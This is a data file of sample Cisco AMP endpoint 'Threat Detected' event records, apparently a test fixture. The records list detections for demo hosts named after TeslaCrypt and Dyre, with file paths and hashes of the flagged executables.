+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
